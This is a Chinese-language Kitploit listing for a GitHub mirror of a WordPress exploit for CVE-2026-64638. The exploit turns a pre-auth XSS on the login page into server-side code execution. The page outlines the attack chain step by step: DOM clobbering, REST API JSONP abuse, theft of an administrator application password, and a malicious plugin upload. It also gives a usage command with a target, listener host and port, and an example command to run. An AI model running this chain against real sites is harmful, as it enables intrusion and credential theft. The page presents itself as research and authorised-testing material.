Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-64638 — 概念验证:利用 WordPress 预认证 XSS 实现 RCE,通过 DOM clobbering、REST API 滥用及恶意插件上传达成服务端执行。仅限授权测试。 | Kitploit
工具/GitHubGitHub/hackspeak/cve-2026-64638
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试对抗性攻击
GitHubhackspeak/cve-2026-64638

CVE-2026-64638

概念验证:利用 WordPress 预认证 XSS 实现 RCE,通过 DOM clobbering、REST API 滥用及恶意插件上传达成服务端执行。仅限授权测试。

查看仓库
112天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-64638 — XSS2Shell:WordPress 登录页预认证 XSS → 服务器 RCE

HackSpeak 分发镜像。本仓库为 WordSec 发布的 XSS2Shell 教育用途 PoC(CVE-2026-64638)的分发镜像,代码与上游一致;上游为 MIT License,Copyright (c) 2026 WordSec。

⚠️ 仅供安全研究与授权测试使用,仅可对本人拥有或有书面授权评估的 WordPress 站点运行;PoC 会生成并清理临时发布物,请勿针对第三方管理员或生产系统。

漏洞简述

XSS2Shell(CVE-2026-64638) 是 WordPress 登录页(wp-login.php)上的预认证反射型 XSS,可经完整链路升级为服务器端 PHP 代码执行(RCE)。

  • 根因:PHP strip_tags() 与 WordPress KSES(wp_kses_post())的解析分歧——在 < 与标签名之间插入空格(如 < area),前者视为普通文本保留,后者解析为合法 HTML 元素(<area>/<div>/<button> 均在允许列表);
  • XSS:无需认证,提交伪造用户名即可在失败登录错误页触发;
  • RCE 链:DOM Clobbering 劫持 ajaxurl → 登录页自带 user-profile.js 自动触发 jQuery POST → REST API JSONP(_jsonp)→ Same Origin Method Execution(SOME,Paulos Yibelo 2022)→ 跨窗口点击管理员 Application Password 授权按钮 → 窃取 API 凭据 → 发布含 <script> 的页面 → 上传恶意插件 ZIP → PHP 直接执行(无需激活);
  • 影响:几乎所有 WordPress 版本(4.9.0–7.0.2);修复 7.0.3(2026-08-06,紧急),已回移植到 4.7 起全部维护分支。

用法

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
参数说明
-t, --targetWordPress 基地址(含 http/https,自动归一化尾斜杠)

依赖:Python 3.7+,零第三方包;需管理员登录目标站并打开攻击者 URL(一次交互)。

免责声明

  • 仅供安全研究、漏洞验证与防御性测试使用;请在可销毁环境运行,勿对未授权系统使用。
  • PoC 为教育用途代码,基于公开技术分析,使用前请阅读上游说明与目标授权边界。

参考链接

  • 上游源仓库(本 PoC 来源):https://github.com/wordsec/XSS2Shell
  • pwn.ai 官方披露:XSS2Shell — https://pwn.ai/blog/xss2shell
  • WordPress 官方安全公告:GHSA-52p2-r8wf-jcrf — https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-52p2-r8wf-jcrf
  • WordPress 7.0.3 发布公告:https://wordpress.org/news/2026/08/wordpress-7-0-3-release/
  • The Hacker News 报道:https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • WordSec 技术分析 + PoC 说明:https://wordsec.net/blog/xss2shell-wordpress-pre-auth-xss-to-rce-cve-2026-64638
下载工具
-c, --commandshell 就绪后要执行的命令
--lhost / --lport监听地址/端口(lport 0 = 随机)
--keep保留临时发布页(默认清理)